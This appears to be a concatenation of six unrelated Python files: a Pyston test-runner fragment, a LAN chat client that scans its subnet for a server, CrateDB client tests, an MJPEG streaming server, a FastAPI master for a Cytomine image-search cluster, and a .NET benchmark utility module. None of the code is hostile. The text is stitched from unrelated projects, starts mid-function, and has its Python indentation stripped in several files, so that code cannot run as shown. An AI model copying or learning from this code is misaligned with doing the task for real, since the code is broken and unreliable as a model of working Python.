TESTS_TO_SKIP = filter(bool, TESTS_TO_SKIP) # "".split(',') == ['']
EXIT_CODE_ONLY = opts.exit_code_only
SKIP_FAILING_TESTS = opts.skip_failing
TEST_DIR = os.path.join(orig_dir, opts.test_dir)
EXTMODULE_DIR_PYSTON = os.path.abspath(os.path.dirname(os.path.realpath(IMAGE)) + "/test/test_extension/")
EXTMODULE_DIR = os.path.abspath(os.path.dirname(os.path.realpath(IMAGE)) + "/test/test_extension/build/lib.linux-x86_64-2.7/")
patterns = opts.pattern
if not patterns and not TESTS_TO_SKIP:
TESTS_TO_SKIP = ["t", "t2"]
assert os.path.isdir(TEST_DIR), "%s doesn't look like a directory with tests in it" % TEST_DIR
if TEST_DIR.rstrip('/').endswith("cpython") and not EXIT_CODE_ONLY:
print >>sys.stderr, "Test directory name ends in cpython; are you sure you don't want --exit-code-only?"
# do we need this any more?
IGNORE_STATS = ["%s/%d.py" % (TEST_DIR, i) for i in ()] + []
tests = [t for t in glob.glob("%s/*.py" % TEST_DIR)]
LIB_DIR = os.path.join(sys.prefix, "lib/python2.7")
for t in tests:
bn = os.path.basename(t)
assert bn.endswith(".py")
module_name = bn[:-3]
if os.path.exists(os.path.join(LIB_DIR, module_name)) or \
os.path.exists(os.path.join(LIB_DIR, module_name + ".py")) or \
module_name in sys.builtin_module_names:
raise Exception("Error: %s hides builtin module '%s'" % (t, module_name))
if patterns:
filtered_tests = []
for t in tests:
if any(re.match(os.path.join(TEST_DIR, p) + ".*\.py", t) for p in patterns):
filtered_tests.append(t)
tests = filtered_tests
if not tests:
print >>sys.stderr, "No tests matched the given patterns. OK by me!"
# this can happen legitimately in e.g. `make check_test_foo` if test_foo.py is a CPython regression test.
sys.exit(0)
FN_JUST_SIZE = max(20, 2 + max(len(os.path.basename(fn)) for fn in tests))
if TEST_PYPY:
IMAGE = '/usr/local/bin/pypy'
if not patterns:
if opts.order_by_mtime:
tests.sort(key=lambda fn:os.stat(fn).st_mtime, reverse=True)
else:
tests.sort(key=fileSize)
for fn in tests:
check_stats = fn not in IGNORE_STATS
q.put((fn, check_stats, run_memcheck))
threads = []
for i in xrange(NUM_THREADS):
t = threading.Thread(target=worker_thread)
t.setDaemon(True)
t.start()
threads.append(t)
q.put(None)
for fn in tests:
with cv:
while fn not in results:
try:
cv.wait(1)
except KeyboardInterrupt:
print >>sys.stderr, "Interrupted"
sys.exit(1)
if results[fn] is None:
assert quit
print quit.pop(fn).strip()
for fn, s in quit.items():
print "(%s also failed)" % fn
sys.exit(1)
break
name = os.path.basename(fn).rjust(FN_JUST_SIZE)
msgs = results[fn]
if isinstance(msgs,str):
msgs = [msgs]
print ' '.join([name] + list(msgs))
for t in threads:
t.join()
if failed:
sys.exit(1)
if __name__ == "__main__":
origdir = os.getcwd()
tmpdir = tempfile.mkdtemp()
os.chdir(tmpdir)
try:
main(origdir)
finally:
shutil.rmtree(tmpdir)
# adding a comment here to invalidate cached expected results
|
reciver.py
|
import socket
from os import popen
from multiprocessing import Process
s = socket.socket()
ip=(popen("hostname -I | awk '{print $1}'").read()).strip()
port = 15450
b = "\033[35m"
w = "\033[0m"
# Scan the local /24 subnet (last octet 0-99) until a listening server is found.
for i in range(100):
    temip = ip.rsplit('.', 1)[0] + '.' + str(i)
    try:
        s.connect((temip, port))
        break
    except (ConnectionRefusedError, OSError):
        pass
else:
    raise SystemExit("no server found on the local subnet")
print("connection successful!")
def recive():
    # Print every message from the server until it announces shutdown.
    while True:
        cmd = s.recv(1024).decode()
        print(b + cmd + "\n" + w)
        if cmd == "exit server":
            s.close()
            break

p1 = Process(target=recive)
p1.start()

# Forward local input to the server until the user types "exit server".
x = ""
while x != "exit server":
    x = input()
    s.send(x.encode())
s.close()
|
tests.py
|
# -*- coding: utf-8; -*-
#
# Licensed to CRATE Technology GmbH ("Crate") under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. Crate licenses
# this file to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may
# obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# However, if you have executed another commercial license agreement
# with Crate these terms will supersede the license and you may use the
# software solely pursuant to the terms of the relevant commercial agreement.
from __future__ import absolute_import
import json
import os
import unittest
import doctest
from pprint import pprint
from datetime import datetime, date
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
import time
import threading
import logging
from crate.testing.layer import CrateLayer
from crate.testing.tests import crate_path, docs_path
from crate.client import connect
from crate.client.sqlalchemy.dialect import CrateDialect
from . import http
from .test_cursor import CursorTest
from .test_connection import ConnectionTest
from .test_http import (
HttpClientTest,
ThreadSafeHttpClientTest,
KeepAliveClientTest,
ParamsTest,
RetryOnTimeoutServerTest,
RequestsCaBundleTest,
TestUsernameSentAsHeader,
TestDefaultSchemaHeader,
)
from .sqlalchemy.tests import test_suite as sqlalchemy_test_suite
from .sqlalchemy.types import ObjectArray
log = logging.getLogger('crate.testing.layer')
ch = logging.StreamHandler()
ch.setLevel(logging.ERROR)
log.addHandler(ch)
def cprint(s):
if isinstance(s, bytes):
s = s.decode('utf-8')
print(s)
class ClientMocked(object):
active_servers = ["http://localhost:4200"]
def __init__(self):
self.response = {}
self._server_infos = ("http://localhost:4200", "my server", "0.42.0")
def sql(self, stmt=None, parameters=None, bulk_parameters=None):
return self.response
def server_infos(self, server):
return self._server_infos
def set_next_response(self, response):
self.response = response
def set_next_server_infos(self, server, server_name, version):
self._server_infos = (server, server_name, version)
def close(self):
pass
def setUpMocked(test):
test.globs['connection_client_mocked'] = ClientMocked()
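# Crate node settings for the test layer: disable usage-data collection, enable the
# JavaScript language, and configure host-based auth (trust for 'crate' and
# 'trusted_me', password auth for 'me').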
settings = {
'udc.enabled': 'false',
'lang.js.enabled': 'true',
'auth.host_based.enabled': 'true',
'auth.host_based.config.0.user': 'crate',
'auth.host_based.config.0.method': 'trust',
'auth.host_based.config.98.user': 'trusted_me',
'auth.host_based.config.98.method': 'trust',
'auth.host_based.config.99.user': 'me',
'auth.host_based.config.99.method': 'password',
}
crate_port = 44209
crate_transport_port = 44309
local = '127.0.0.1'
crate_layer = CrateLayer('crate',
crate_home=crate_path(),
port=crate_port,
host=local,
transport_port=crate_transport_port,
settings=settings)
crate_host = "{host}:{port}".format(host=local, port=crate_port)
crate_uri = "http://%s" % crate_host
def refresh(table):
with connect(crate_host) as conn:
cursor = conn.cursor()
cursor.execute("refresh table %s" % table)
def setUpWithCrateLayer(test):
test.globs['HttpClient'] = http.Client
test.globs['crate_host'] = crate_host
test.globs['pprint'] = pprint
test.globs['print'] = cprint
test.globs["refresh"] = refresh
with connect(crate_host) as conn:
cursor = conn.cursor()
with open(docs_path('testing/testdata/mappings/locations.sql')) as s:
stmt = s.read()
cursor.execute(stmt)
stmt = ("select count(*) from information_schema.tables "
"where table_name = 'locations'")
cursor.execute(stmt)
assert cursor.fetchall()[0][0] == 1
data_path = docs_path('testing/testdata/data/test_a.json')
# load testing data into crate
cursor.execute("copy locations from ?", (data_path,))
# refresh location table so imported data is visible immediately
cursor.execute("refresh table locations")
# create blob table
cursor.execute("create blob table myfiles clustered into 1 shards " +
"with (number_of_replicas=0)")
# create users
cursor.execute("CREATE USER me WITH (password = 'my_secret_pw')")
cursor.execute("CREATE USER trusted_me")
def setUpCrateLayerAndSqlAlchemy(test):
setUpWithCrateLayer(test)
import sqlalchemy as sa
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
with connect(crate_host) as conn:
cursor = conn.cursor()
cursor.execute("""create table characters (
id string primary key,
name string,
quote string,
details object,
more_details array(object),
INDEX name_ft using fulltext(name) with (analyzer = 'english'),
INDEX quote_ft using fulltext(quote) with (analyzer = 'english')
) """)
with connect(crate_host) as conn:
cursor = conn.cursor()
cursor.execute("""create table cities (
name string primary key,
coordinate geo_point,
area geo_shape
) """)
engine = sa.create_engine('crate://{0}'.format(crate_host))
Base = declarative_base()
class Location(Base):
__tablename__ = 'locations'
name = sa.Column(sa.String, primary_key=True)
kind = sa.Column(sa.String)
date = sa.Column(sa.Date, default=date.today)
datetime = sa.Column(sa.DateTime, default=datetime.utcnow)
nullable_datetime = sa.Column(sa.DateTime)
nullable_date = sa.Column(sa.Date)
flag = sa.Column(sa.Boolean)
details = sa.Column(ObjectArray)
Session = sessionmaker(engine)
session = Session()
test.globs['sa'] = sa
test.globs['engine'] = engine
test.globs['Location'] = Location
test.globs['Base'] = Base
test.globs['session'] = session
test.globs['Session'] = Session
test.globs['CrateDialect'] = CrateDialect
class HttpsTestServerLayer(object):
PORT = 65534
HOST = "localhost"
CERT_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__),
"test_https.pem"))
__name__ = "httpsserver"
__bases__ = tuple()
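    # Minimal test layer (setUp/tearDown hooks) that serves a canned JSON response
    # over HTTPS using the bundled test certificate, for client TLS tests.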
class HttpsServer(HTTPServer):
def get_request(self):
socket, client_address = HTTPServer.get_request(self)
socket = ssl.wrap_socket(socket,
keyfile=HttpsTestServerLayer.CERT_FILE,
certfile=HttpsTestServerLayer.CERT_FILE,
cert_reqs=ssl.CERT_OPTIONAL,
server_side=True)
return socket, client_address
class HttpsHandler(BaseHTTPRequestHandler):
payload = json.dumps({"name": "test", "status": 200, })
def do_GET(self):
self.send_response(200)
self.send_header("Content-Length", len(self.payload))
self.send_header("Content-Type", "application/json; charset=UTF-8")
self.end_headers()
self.wfile.write(self.payload.encode('UTF-8'))
return
def __init__(self):
self.server = self.HttpsServer(
(self.HOST, self.PORT),
self.HttpsHandler
)
def setUp(self):
thread = threading.Thread(target=self.serve_forever)
        thread.daemon = True  # do not block interpreter exit on this thread
thread.start()
time.sleep(1)
def serve_forever(self):
print("listening on", self.HOST, self.PORT)
self.server.serve_forever()
print("server stopped.")
def tearDown(self):
self.server.shutdown()
def setUpWithHttps(test):
test.globs['HttpClient'] = http.Client
test.globs['crate_host'] = "https://{0}:{1}".format(
HttpsTestServerLayer.HOST, HttpsTestServerLayer.PORT
)
test.globs['invalid_ca_cert'] = os.path.abspath(
os.path.join(os.path.dirname(__file__), "invalid_ca.pem")
)
test.globs['valid_ca_cert'] = os.path.abspath(
os.path.join(os.path.dirname(__file__), "test_https_ca.pem")
)
test.globs['pprint'] = pprint
test.globs['print'] = cprint
def _try_execute(cursor, stmt):
try:
cursor.execute(stmt)
except Exception:
pass
def tearDownWithCrateLayer(test):
# clear testing data
with connect(crate_host) as conn:
for stmt in ["DROP TABLE locations",
"DROP BLOB TABLE myfiles",
"DROP TABLE characters",
"DROP TABLE cities",
"DROP USER me",
"DROP USER trusted_me",
]:
_try_execute(conn.cursor(), stmt)
def test_suite():
suite = unittest.TestSuite()
flags = (doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS)
s = doctest.DocFileSuite(
'doctests/cursor.txt',
'doctests/connection.txt',
setUp=setUpMocked,
optionflags=flags,
encoding='utf-8'
)
suite.addTest(s)
suite.addTest(unittest.makeSuite(CursorTest))
suite.addTest(unittest.makeSuite(HttpClientTest))
suite.addTest(unittest.makeSuite(KeepAliveClientTest))
suite.addTest(unittest.makeSuite(ThreadSafeHttpClientTest))
suite.addTest(unittest.makeSuite(ParamsTest))
suite.addTest(unittest.makeSuite(ConnectionTest))
suite.addTest(unittest.makeSuite(RetryOnTimeoutServerTest))
suite.addTest(unittest.makeSuite(RequestsCaBundleTest))
suite.addTest(unittest.makeSuite(TestUsernameSentAsHeader))
suite.addTest(unittest.makeSuite(TestDefaultSchemaHeader))
suite.addTest(sqlalchemy_test_suite())
suite.addTest(doctest.DocTestSuite('crate.client.connection'))
suite.addTest(doctest.DocTestSuite('crate.client.http'))
s = doctest.DocFileSuite(
'doctests/https.txt',
setUp=setUpWithHttps,
optionflags=flags,
encoding='utf-8'
)
s.layer = HttpsTestServerLayer()
suite.addTest(s)
s = doctest.DocFileSuite(
'sqlalchemy/doctests/itests.txt',
'sqlalchemy/doctests/dialect.txt',
'sqlalchemy/doctests/reflection.txt',
setUp=setUpCrateLayerAndSqlAlchemy,
tearDown=tearDownWithCrateLayer,
optionflags=flags,
encoding='utf-8'
)
s.layer = crate_layer
suite.addTest(s)
s = doctest.DocFileSuite(
'doctests/http.txt',
'doctests/blob.txt',
'doctests/client.txt',
'doctests/mocking.txt',
setUp=setUpWithCrateLayer,
tearDown=tearDownWithCrateLayer,
optionflags=flags,
encoding='utf-8'
)
s.layer = crate_layer
suite.addTest(s)
s = doctest.DocFileSuite(
'doctests/sqlalchemy.txt',
setUp=setUpCrateLayerAndSqlAlchemy,
tearDown=tearDownWithCrateLayer,
optionflags=flags,
encoding='utf-8'
)
s.layer = crate_layer
suite.addTest(s)
return suite
|
server.py
|
# FIXME: Make a Python Unit test
import logging
import queue
import socket
import time
from glob import glob
from http.server import HTTPServer, BaseHTTPRequestHandler
from threading import Thread
from pymjpeg import Image, boundary, request_headers, FileImage
logging.basicConfig(level=logging.DEBUG)
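# Each GET is answered as a multipart MJPEG stream: for every frame the handler
# writes the part boundary, the per-part headers, and the raw JPEG bytes.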
class FileImageHandler(BaseHTTPRequestHandler):
def do_GET(self):
logging.debug('GET response code: 200')
self.send_response(200)
# Response headers (multipart)
for k, v in request_headers().items():
self.send_header(k, v)
logging.debug('GET response header: ' + k + '=' + v)
# Multipart content
self.serve_images()
def serve_image(self, image: Image):
# Part boundary string
self.end_headers()
self.wfile.write(bytes(boundary, 'utf-8'))
self.end_headers()
# Part headers
for k, v in image.image_headers().items():
self.send_header(k, v)
# logging.debug('GET response header: %s = %s' % (k, v))
self.end_headers()
# Part binary
# logging.debug('GET response image: ' + filename)
try:
for chunk in image.get_byte_generator():
self.wfile.write(chunk)
except (ConnectionResetError, ConnectionAbortedError):
return
def serve_images(self):
t_start = time.time()
for i, filename in enumerate(glob('img/*.jpg')):
image = FileImage(filename)
logging.debug('GET response image: ' + filename)
self.serve_image(image)
fps = (i+1) / (time.time()-t_start)
logging.debug("served image %d, overall fps: %0.3f" % (i+1, fps))
def log_message(self, format, *args):
return
def BytesImageHandlerFactory(q: queue.Queue):
class BytesImageHandler(FileImageHandler):
def __init__(self, request, client_address, server):
self.queue = q
super().__init__(request, client_address, server)
def serve_images(self):
i = 0
t_start = time.time()
while True:
image = self.queue.get()
self.serve_image(image)
fps = (i + 1) / (time.time() - t_start)
logging.debug("served image %d, overall fps: %0.3f" % (i + 1, fps))
i += 1
def add_image(self, image: Image):
self.queue.put(image)
return BytesImageHandler
class MJPEGServer:
def __init__(self, port=8001, handler=FileImageHandler):
ipaddress = socket.gethostbyname(socket.gethostname())
address = "http://%s:%s" % (ipaddress, port)
logging.info('Listening on port %d ... address: %s' % (port, address))
self.httpd = HTTPServer(('', port), handler)
def start(self):
self.httpd.serve_forever()
if __name__ == '__main__':
from_files = True
if from_files:
# from files
server = MJPEGServer()
server.start()
else:
        # from bytes, which could come from a byte stream or be generated with e.g. OpenCV
image_queue = queue.Queue(maxsize=100)
handler_class = BytesImageHandlerFactory(q=image_queue)
server = MJPEGServer(handler=handler_class)
server_thread = Thread(target=server.start, daemon=True)
server_thread.start()
for filename in glob('img/*.jpg'):
image = FileImage(filename)
logging.debug('GET response image: ' + filename)
image_queue.put(image)
        # wait until the current queue has been served before quitting
while not image_queue.empty():
time.sleep(1)
server_thread.join(timeout=1)
|
master.py
|
from fastapi import FastAPI, File, UploadFile, Request, Cookie, HTTPException
import uvicorn
import argparse
import json
import aiohttp
import requests
import multiprocessing
from cytomine import Cytomine
from cytomine.models import CurrentUser
from io import BufferedReader, BytesIO
from collections import defaultdict
import numpy as np
import faiss
import asyncio
import random
import zipfile
from cytomine.models.image import ImageInstanceCollection
import threading
import time
app = FastAPI()
class Master:
def __init__(self, ip, port, servers, http, host):
self.ip = ip
self.port = port
if servers is not None:
self.servers = {s: 0 for s in servers}
else:
self.servers = {}
self.http = 'http' if http else 'https'
self.host = host
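        # Background heartbeat: periodically ping every worker server and mark
        # unreachable ones with infinite load so they sort last.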
threading.Thread(target=self.heartbeat, daemon=True).start()
def heartbeat(self):
while True:
for ip in self.servers.keys():
try:
req = requests.get('{}://{}/heartbeat'.format(self.http, ip), timeout=5)
except Exception as e:
self.servers[ip] = (np.inf, np.inf)
time.sleep(5)
parser = argparse.ArgumentParser()
parser.add_argument(
'--ip',
default='127.0.0.1'
)
parser.add_argument(
'--port',
default=8000,
type=int
)
parser.add_argument(
'--server_addresses',
nargs='+'
)
parser.add_argument(
'--http',
action='store_true'
)
parser.add_argument(
'--host'
)
args = parser.parse_args()
if __name__ != '__main__':
master = Master(args.ip, args.port, args.server_addresses, args.http, args.host)
lock = defaultdict(lambda: asyncio.Lock())
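# Order servers by reported load: by labeled-image count when working with labeled
# data, otherwise by unlabeled-image count (counts are reported via /connect).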
def sort_ips(ip_list, labeled):
if labeled:
ip_list.sort(key = lambda k: k[1][0])
else:
ip_list.sort(key = lambda k: k[1][1])
return [i for i, j in ip_list]
@app.get('/connect')
def connect(ip: str, nbr_images_labeled: int, nbr_images_unlabeled: int):
master.servers[ip] = (nbr_images_labeled, nbr_images_unlabeled)
return
@app.get('/servers_list')
def servers_list():
return {'list': list(master.servers.items())}
@app.post('/get_nearest_images')
async def nearest_images(nrt_neigh: int, client_pub_key: str='', only_labeled: str='true',
client_pri_key: str='', image: UploadFile=File(...)):
with Cytomine(host=master.host, public_key=client_pub_key, private_key=client_pri_key):
user = CurrentUser().fetch()
if user is False:
raise HTTPException(401, 'Unauthorized')
content = await image.read()
responses = []
ip_list = list(master.servers.keys())
async with lock[client_pub_key]:
async with aiohttp.ClientSession(trust_env=True) as session:
for ip in ip_list:
data = aiohttp.FormData()
data.add_field('image', content, filename=image.filename, content_type='multipart/form-data')
try:
async with session.post('{}://{}/nearest_neighbours/{}'.format(master.http, ip, only_labeled),
data=data,
params={'nrt_neigh': nrt_neigh, 'public_key': client_pub_key,
'private_key': client_pri_key},
headers={'Content-Encoding': 'gzip'},
timeout=aiohttp.ClientTimeout(100)) as resp:
responses.append(await resp.json())
except Exception as e:
print(e)
responses.append(None)
        if all(r is None for r in responses):
raise HTTPException(status_code=500, detail='No server alive')
indices = [i for i, _ in enumerate(responses) if responses[i] is not None]
ip_list = [ip_list[i] for i in indices]
req = [responses[i] for i in indices]
distances = np.zeros((len(req) * nrt_neigh, 1), dtype=np.float32)
for i, r in enumerate(req):
distances[i * nrt_neigh: i * nrt_neigh + len(r['distances']), :] = np.array(r['distances']).reshape((-1, 1))
distances[i * nrt_neigh + len(r['distances']): (i+1) * nrt_neigh, :] = 100000
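        # Merge results across servers: stack every per-server distance into a 1-D
        # faiss L2 index and query it with 0 to keep the globally nearest nrt_neigh hits.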
index = faiss.IndexFlatL2(1)
index.add(distances)
_, labels = index.search(np.array([[0]], dtype=np.float32), nrt_neigh)
to_retrieve = defaultdict(list)
for l in labels[0]:
to_retrieve[l // nrt_neigh].append(int(l % nrt_neigh))
images = []
cls = []
names = []
async with aiohttp.ClientSession(trust_env=True) as session:
for ip, lbls in zip(ip_list, to_retrieve.values()):
if lbls != []:
try:
async with session.get('{}://{}/retrieve_images/{}'.format(master.http, ip, only_labeled),
params={'public_key': client_pub_key, 'private_key': client_pri_key},
json={'labels': list(lbls)},
timeout=aiohttp.ClientTimeout(100)) as resp:
images.append((await resp.json())['images'])
cls.append((await resp.json())['cls'])
names.append((await resp.json())['names'])
except Exception as e:
pass
if images == []:
raise HTTPException(status_code=500, detail='No server alive')
return {'images': [i for sublist in images for i in sublist],
'cls': [c for sublist in cls for c in sublist],
'names': [n for sublist in names for n in sublist],
'distances': [float(distances[l, 0]) for l in list(labels[0])]}
@app.post('/index_image')
async def put_image(client_pub_key: str, client_pri_key: str, image: UploadFile=File(...), label: str=''):
with Cytomine(host=master.host, public_key=client_pub_key, private_key=client_pri_key):
user = CurrentUser().fetch()
if user is False:
raise HTTPException(401, 'Unauthorized')
content = await image.read()
ip_list = sort_ips(list(master.servers.items()), label != '')
while True:
ip = ip_list.pop(0)
async with aiohttp.ClientSession(trust_env=True) as session:
try:
data = aiohttp.FormData()
data.add_field('image', content, filename=image.filename, content_type='multipart/form-data')
async with session.post('{}://{}/index_image'.format(master.http, ip),
data=data,
params={'label': label, 'public_key': client_pub_key,
'private_key': client_pri_key},
headers={'Content-Encoding': 'gzip'},
timeout=aiohttp.ClientTimeout(100)) as resp:
status = resp.status
if status == 409 or status == 422:
                        raise HTTPException(status_code=status, detail=(await resp.json())['detail'])
if status != 200 and ip_list == []:
raise HTTPException(status_code=500, detail='No server alive')
if status == 200:
break
except Exception as e:
if ip_list == []:
raise HTTPException(status_code=500, detail='No server alive')
@app.post('/index_folder')
async def put_folder(client_pub_key: str, client_pri_key: str, labeled: bool, folder: UploadFile=File(...)):
with Cytomine(host=master.host, public_key=client_pub_key, private_key=client_pri_key):
user = CurrentUser().fetch()
if user is False:
raise HTTPException(401, 'Unauthorized')
content = await folder.read()
ip_list = sort_ips(list(master.servers.items()), labeled)
print(ip_list)
while True:
ip = ip_list.pop(0)
async with aiohttp.ClientSession(trust_env=True) as session:
try:
data = aiohttp.FormData()
data.add_field('folder', content, filename=folder.filename, content_type='multipart/form-data')
async with session.post('{}://{}/index_folder'.format(master.http, ip),
data=data,
params={'labeled': str(labeled), 'public_key': client_pub_key,
'private_key': client_pri_key},
headers={'Content-Encoding': 'gzip'},
timeout=aiohttp.ClientTimeout(5)) as resp:
status = resp.status
if status == 409 or status == 422 or status == 401:
raise HTTPException(status_code=status, detail= (await resp.json())['detail'])
if status != 200 and ip_list == []:
raise HTTPException(status_code=500, detail='No server alive')
if status == 200:
break
except HTTPException as h:
raise HTTPException(h.status_code, h.detail)
except Exception as e:
if ip_list == []:
raise HTTPException(status_code=500, detail='No server alive')
@app.get('/remove_image')
async def remove_image(client_pub_key: str, client_pri_key: str, name: str):
with Cytomine(host=master.host, public_key=client_pub_key, private_key=client_pri_key):
user = CurrentUser().fetch()
if user is False:
raise HTTPException(401, 'Unauthorized')
ip_list = list(master.servers.keys())
for ip in ip_list:
async with aiohttp.ClientSession(trust_env=True) as session:
try:
async with session.get('{}://{}/remove_image'.format(master.http, ip),
params={'name': name, 'public_key': client_pub_key,
'private_key': client_pri_key},
timeout=aiohttp.ClientTimeout(5)) as resp:
pass
except Exception as e:
pass
@app.get('/index_slides')
async def add_slides(client_pub_key: str, client_pri_key: str, project_id: str):
with Cytomine(host=master.host, public_key=client_pub_key, private_key=client_pri_key):
user = CurrentUser().fetch()
if user is False:
raise HTTPException(401, 'Unauthorized')
image_instances = ImageInstanceCollection().fetch_with_filter("project", project_id)
for image in image_instances:
ip_list = sort_ips(list(master.servers.items()), False)
while True:
            ip = ip_list.pop(0)
async with aiohttp.ClientSession(trust_env=True) as session:
try:
await session.get('{}://{}/add_slide'.format(master.http, ip),
params={'public_key': client_pub_key,
'private_key': client_pri_key},
json={'id': image.id, 'width':image.width, 'project': project_id,
'height': image.height, 'resolution': image.resolution,
'magnification': image.magnification,
'filename': image.filename, 'originalFilename': image.filename},
timeout=aiohttp.ClientTimeout(300))
break
except Exception as e:
print(e)
if ip_list == []:
raise HTTPException(status_code=500, detail='No server alive')
@app.get('/index_slide_annotations')
async def add_slides_annotations(client_pub_key: str, client_pri_key: str, project_id: str, label: str):
with Cytomine(host=master.host, public_key=client_pub_key, private_key=client_pri_key):
user = CurrentUser().fetch()
if user is False:
raise HTTPException(401, 'Unauthorized')
image_instances = ImageInstanceCollection().fetch_with_filter("project", project_id)
ip_list = sort_ips(list(master.servers.items()), True)
while True:
ip = ip_list.pop(0)
async with aiohttp.ClientSession(trust_env=True) as session:
try:
await session.get('{}://{}/add_slide_annotations'.format(master.http, ip),
params={'public_key': client_pub_key,
'private_key': client_pri_key,
'project_id': project_id,
'term': label},
timeout=aiohttp.ClientTimeout(1000))
break
except Exception as e:
print(e)
if ip_list == []:
raise HTTPException(status_code=500, detail='No server alive')
if __name__ == '__main__':
uvicorn.run('master:app', host=args.ip, port=args.port, reload=True,
debug=False, workers=multiprocessing.cpu_count())
|
util.py
|
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the MIT license.
# See the LICENSE file in the project root for more information.
from __future__ import annotations # Allow subscripting Popen
from dataclasses import dataclass, replace
from datetime import timedelta
from difflib import get_close_matches
from enum import Enum
from functools import reduce
from inspect import getfile
from math import ceil, floor, inf, isclose, isnan
from operator import mul
import os
from os import kill, name as os_name
from os.path import splitext
from pathlib import Path
from platform import node
from signal import signal, SIGINT
from subprocess import DEVNULL, PIPE, Popen, run
from stat import S_IREAD, S_IWRITE, S_IRUSR, S_IWUSR, S_IRGRP, S_IWGRP, S_IROTH, S_IWOTH
from statistics import median, StatisticsError
from sys import argv
from threading import Event, Thread
from time import sleep, time
from typing import Any, Callable, cast, Dict, Iterable, List, Mapping, Optional, Sequence, Union
from xml.etree.ElementTree import Element, parse as parse_xml
from psutil import process_iter
from result import Err, Ok, Result
from .collection_util import add, find, identity, is_empty, min_max_float
from .option import option_or
from .type_utils import check_cast, T, U, V, with_slots
def remove_str_start(s: str, start: str) -> str:
assert s.startswith(start), f"Expected {s} to start with {repr(start)}"
return s[len(start) :]
def remove_str_end(s: str, end: str) -> str:
assert s.endswith(end), f"Expected {s} to end with {end}"
return s[: -len(end)]
def remove_str_start_end(s: str, start: str, end: str) -> str:
return remove_str_end(remove_str_start(s, start), end)
def try_remove_str_start(s: str, start: str) -> Optional[str]:
return remove_str_start(s, start) if s.startswith(start) else None
def try_remove_str_end(s: str, end: str) -> Optional[str]:
return remove_str_end(s, end) if s.endswith(end) else None
def remove_char(s: str, char: str) -> str:
return s.translate(str.maketrans("", "", char))
def ensure_empty_dir(dir_path: Path) -> None:
ensure_dir(dir_path)
clear_dir(dir_path)
def unlink_if_exists(path: Path) -> None:
if path.exists():
path.unlink()
def clear_dir(dir_path: Path) -> None:
tries = 1
while tries > 0:
try:
# shutil.rmtree fails: github.com/hashdist/hashdist/issues/113#issuecomment-25374977
# TODO: avoid str(path)
for sub in dir_path.iterdir():
if not sub.is_dir():
sub.unlink()
for sub in dir_path.iterdir():
assert sub.is_dir()
clear_dir(sub)
sub.rmdir()
except OSError as e:
tries -= 1
if tries <= 0 or "The directory is not empty" not in e.strerror:
raise
sleep(1)
else:
break
def ensure_dir(dir_path: Path) -> None:
if not dir_path.exists():
assert dir_path.parent != dir_path
ensure_dir(dir_path.parent)
dir_path.mkdir()
def get_factor_diff(old: float, new: float) -> float:
if old == 0:
return 0 if new == 0 else inf if new > 0 else -inf
else:
return (new - old) / old
def get_max_factor_diff(values: Iterable[float]) -> Optional[float]:
mm = min_max_float(values)
return None if mm is None else get_factor_diff(*mm.to_pair())
def product(values: Sequence[float]) -> float:
return reduce(mul, values)
def geometric_mean(values: Sequence[float]) -> float:
# Geometric mean only works for positive values
assert all(v > 0 for v in values)
# 'pow' returns 'Any', this has caused me problems in the past
return check_cast(float, pow(product(values), 1.0 / len(values)))
def assert_is_percent(p: float) -> float:
    assert 0 <= p <= 100, f"{p} is not a percentage"
    return p
def get_percent(f: float) -> float:
return f * 100
def percent_to_fraction(p: float) -> float:
return p / 100
def float_to_str(f: float) -> str:
if f == 0:
return "0"
elif isnan(f):
return "NaN"
else:
def get_fmt() -> str:
a = abs(f)
if 0.001 <= a < 10000:
if a < 0.01:
return "%.5f"
elif a < 0.1:
return "%.4f"
elif a < 1:
return "%.3f"
elif a < 10:
return "%.2f"
elif a < 100:
return "%.1f"
else:
return "%.0f"
else:
return "%.2e"
res = get_fmt() % f
assert isclose(float(res), f, rel_tol=5e-3)
return res
def float_to_str_smaller(f: float) -> str:
if f == 0:
return "0"
elif isnan(f):
return "NaN"
else:
def get_fmt() -> str:
a = abs(f)
if 0.01 <= a < 1000:
if a < 0.1:
return "%.3f"
elif a < 1:
return "%.2f"
elif a < 10:
return "%.1f"
else:
return "%.0f"
else:
return "%.1e"
res = get_fmt() % f
assert isclose(float(res), f, rel_tol=5e-2)
return res
def _assert_exists(path: Path) -> Path:
assert path.exists(), f"Could not find {path}"
return path
def assert_file_exists(path: Path) -> Path:
_assert_exists(path)
assert path.is_file(), f"{path} is not a file"
return path
def assert_dir_exists(path: Path) -> Path:
_assert_exists(path)
assert path.is_dir(), f"{path} is not a directory"
return path
def make_absolute_path(path: Path) -> Path:
if path.is_absolute():
return path
else:
return Path.cwd() / path
def get_existing_absolute_path(path: object, message: Optional[Callable[[], str]] = None) -> Path:
assert isinstance(path, str)
p = Path(path)
assert p.is_absolute(), f"Path {path} should be absolute" if message is None else message()
return _assert_exists(p)
def get_existing_absolute_file_path(
path: object, message: Optional[Callable[[], str]] = None
) -> Path:
p = get_existing_absolute_path(path, message)
assert p.is_file(), f"Path {p} exists, but is not a file"
return p
def stdev_frac(stdv: float, avg: float) -> float:
if avg == 0.0:
return 0.0 if stdv == 0.0 else 1.0
else:
return stdv / avg
def os_is_windows() -> bool:
return {OS.posix: False, OS.windows: True}[get_os()]
class OS(Enum):
posix = 0
windows = 1
def get_os() -> OS:
return {"nt": OS.windows, "posix": OS.posix}[os_name]
@with_slots
@dataclass(frozen=True)
class ExecArgs:
cmd: Sequence[str]
cwd: Optional[Path] = None
env: Optional[Mapping[str, str]] = None
# Don't print the command before running
quiet_print: bool = False
# Ignore print to stdout
quiet_stdout: bool = False
# Ignore print to stderr
quiet_stderr: bool = False
def print(self) -> None:
if not self.quiet_print:
print(self)
def __str__(self) -> str:
s = " ".join(self.cmd)
if self.cwd is not None:
s += f" (cwd {self.cwd})"
# printing env is too verbose
return s
